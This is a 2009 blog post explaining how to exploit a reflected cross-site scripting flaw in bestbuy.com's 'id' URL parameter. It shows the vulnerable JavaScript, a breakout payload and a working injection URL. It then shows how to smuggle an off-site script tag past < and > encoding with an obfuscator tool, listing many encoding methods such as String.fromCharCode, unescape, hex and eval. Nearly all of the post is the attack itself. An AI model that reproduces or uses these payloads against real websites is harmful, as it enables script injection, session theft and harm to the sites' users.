This site is soon to be deprecated by http://www.johnleitch.net

Friday, May 8, 2009

Injecting Script Tags Without Access to Less Than and Greater Than Characters - Bestbuy.com

Many times an XSS vulnerability allows for injection of JavaScript, but will (seemingly) prohibit XHTML by encoding < and > respectively as &lt; and &gt;. This certainly complicates matters, but with a little effort and obfuscation we can sidestep such preventative measures. To assist in such tasks I created XSS JavaScript Obfuscator (creative name, I know).

Let's take a look at http://www.bestbuy.com/ to see what can be done with such utilities. As always the first thing we need to do is find the vulnerability. A little testing reveals that the id field is vulnerable to JavaScript injection.
http://www.bestbuy.com/site/olspage.jsp?id=testA.,:;\'"<>()[]{}&type=category
And here is the vulnerable line of JavaScript:

ForeCStdSetCookie(triggerParms["oecpp_exitPage"], "testA.,:;\'"()[]{}- page-detail-404-error", null, "/", triggerParms["domain"])
By in injecting ",null,"/",triggerParms["domain"]);var%20x%3Dnew%20Array(" we can turn the vulnerable block of code into this:

ForeCStdSetCookie(triggerParms["oecpp_exitPage"], "",null,"/",triggerParms["domain"]);var x=new Array("- page-detail-404-error", null, "/", triggerParms["domain"]);
At this point we can easily inject JavaScript
http://www.bestbuy.com/site/olspage.jsp?id=",null,"/",triggerParms["domain"]);alert('Hello,%20World!');var%20x%3Dnew%20Array("&type=category

But with less than and greater than characters blocked how can we include an off-site script? This is where the obfuscator comes in. To use it, we're going to have to split our attack into parts.

Url Prefix http://www.bestbuy.com/site/olspage.jsp?id=
Url Suffix &type=category
Attack Vector Prefix ",null,"/",triggerParms["domain"]);
Attack Vector Suffix var x=new Array("
Code <script type="text/javascript" src="http://xss-javascript-obfuscator.googlecode.com/svn/trunk/XSSJavascriptObfuscator/test.js"></script>

Now that we've got our attack broken up lets populate the fields of XSS JavaScript Obfuscator (embedded at the bottom of this post) and generate some links for http://www.bestbuy.com

String.fromCharCode
String.fromCharCode + Partial Url Encode
String.fromCharCode + Complete Url Encode
Unescape Partial Encode
Unescape Partial Encode + Partial Url Encode
Unescape Partial Encode + Full Url Encode
Unescape Full Encode
Unescape Full Encode + Partial Url Encode
Unescape Full Encode + Full Url Encode
Unescape Unicode
Unescape Unicode + Partial Url Encode
Unescape Unicode + Full Url Encode
Hex String
Hext String + Partial Url Encode
Hex String + Full Url Encode

And here we are with several links containing obfuscated JavaScript that will inject a script tag. Testing should reveal which links work best; generally the obfuscation methods ending with a partial URL encode are the most compatible.

XSS JavaScript Obfuscator

Url Prefix

Url Suffix

Attack Vector Prefix

Attack Vector Suffix

Code

Encoded Javascript

Partial Url Encode

Complete Url Encode

Decode Method
String.fromCharCode call
unescape partial encode call
unescape full encode call
unescape full unicode encode call
hex string
Decode Return Call
document.write
eval

1 comment: